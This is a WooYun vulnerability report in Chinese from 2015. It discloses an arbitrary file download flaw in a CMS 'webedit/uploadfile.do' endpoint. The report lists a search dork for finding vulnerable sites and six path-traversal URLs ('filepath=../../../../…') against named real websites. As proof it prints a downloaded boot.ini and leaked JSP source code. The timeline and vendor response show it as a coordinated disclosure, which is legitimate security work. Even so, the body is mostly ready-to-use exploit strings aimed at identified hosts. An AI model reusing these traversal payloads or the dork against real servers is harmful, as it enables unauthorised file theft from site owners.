当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115521

漏洞标题:某建站系统任意文件下载

相关厂商:cnvd

漏洞作者: Hero

提交时间:2015-05-22 14:58

修复时间:2015-08-24 13:40

公开时间:2015-08-24 13:40

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-22: 细节已通知厂商并且等待厂商处理中
2015-05-26: 厂商已经确认,细节仅向厂商公开
2015-05-29: 细节向第三方安全合作伙伴开放
2015-07-20: 细节向核心白帽子及相关领域专家公开
2015-07-30: 细节向普通白帽子公开
2015-08-09: 细节向实习白帽子公开
2015-08-24: 细节向公众公开

简要描述:

"你为什么有我的源码?"
"怪我咯?"

详细说明:

WooYun: 某建站系统通用sql注入#2
还是这套系统
存在任意文件下载
涉及中国科技教育网 与某些外贸网站
关键字: inurl:contentmanager.do?method=view
漏洞页面:webedit/uploadfile.do?action=open&filepath=
实例:
http://www.cnstedu.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://kxsz.gdec.net/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.cimuset.org/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.fdstmc.org.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.chinaworldmall.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.sqkpym.org.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
www.cnstedu.cn

1.png


$NCJL179FJQ%Z@LS1DATQ1T.png


%VKQF@TC)QU5{H_G8R%W$]L.png


QU45)AB6YW5@0][E_6F4FVE.png


...

漏洞证明:

boot.ini

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(1)partition(2)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(1)partition(2)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect


cms/cmsapp/search.jsp

<%@ page import="com.jalor.cms.column.CMSColumn,
com.jalor.util.treemodel.FolderPath,
com.jalor.util.Function,
com.jalor.cms.actionform.ContentForm,
com.jalor.cms.actionform.ContentAttachmentForm,
com.jalor.cms.content.ContentAttachment,
java.util.Collection,
java.util.Iterator,
java.util.Properties,
com.jalor.cms.actionform.ColumnForm"%>
<%@ page contentType="text/html;charset=GBK" language="java" %>
<%@ taglib uri = "/WEB-INF/jalorportal.tld" prefix = "portal"%>
<%@ taglib uri = "/WEB-INF/jalorcms.tld" prefix = "cms"%>
<%@ taglib uri="/WEB-INF/struts-html.tld" prefix="html" %>
<%@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %>
<%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>
<%@include file="/include/currentuserinfo.jsp"%>
<%@include file="/include/pageexpires.jsp"%>
<%@include file="/include/filepath.jsp"%>
<%
ColumnForm column=(ColumnForm)request.getAttribute("CMSColumnForm");
String url="";
%>
<portal:moduleconfig>
<logic:iterate id="pathinfo" name="columnpath" scope="request">
<%
FolderPath folderPath=(FolderPath)pageContext.getAttribute("pathinfo");
String name=folderPath.getFoldername();
url="/cms/columnmanager.do?method=list&id="+folderPath.getFolderid();
%>
<portal:navigation name="<%=name%>" url="<%=url%>"/>
</logic:iterate>
<%
String columnurl="/cms/columnmanager.do?method=list&id="+column.getId();
%>
<portal:navigation name="<%=column.getName()%>" url="<%=columnurl%>"/>
<portal:pagetab name="搜索" url=""/>
<portal:toolbutton name="返回" url="<%=columnurl%>" image=""/>
</portal:moduleconfig>
<portal:standardstyle insertTemplate="standardheader.vm"/>
<script language="javascript">
</script>
<form action="/cms/contentattachment" method="post">
<input type="hidden" name="method" value="search">
<input type="hidden" name="columnid" value="<%=column.getId()%>">
<table width="90%" bordercolorlight="#000000" bordercolordark="#ffffff" class="labeltable_middle_table">
<tr>
<td class="labeltable_middle_td" align="center">标题</td>
<td class="labeltable_middle_td" align="center">作者</td>
</tr>
<%
Collection lstResult=(Collection)request.getAttribute("resultset");
for(Iterator it=lstResult.iterator();it.hasNext();)
{
Properties prop=(Properties)it.next();
%>
<tr>
<td><a href="/cms/contentmanager.do?method=edit&pageid=edit&columnid=<%=column.getId()%>&templateid=<%=column.getTemplateid()%>&id=<%=prop.getProperty("contentid")%>"><%=prop.getProperty("title","")%></a></td>
<td><%=prop.getProperty("author","")%></td>
</tr>
<%
}
%>
</table>
</form>
<portal:standardstyle insertTemplate="standardfooter.vm" />


修复方案:

目录限制权限?

版权声明:转载请注明来源 Hero@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-05-26 13:38

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无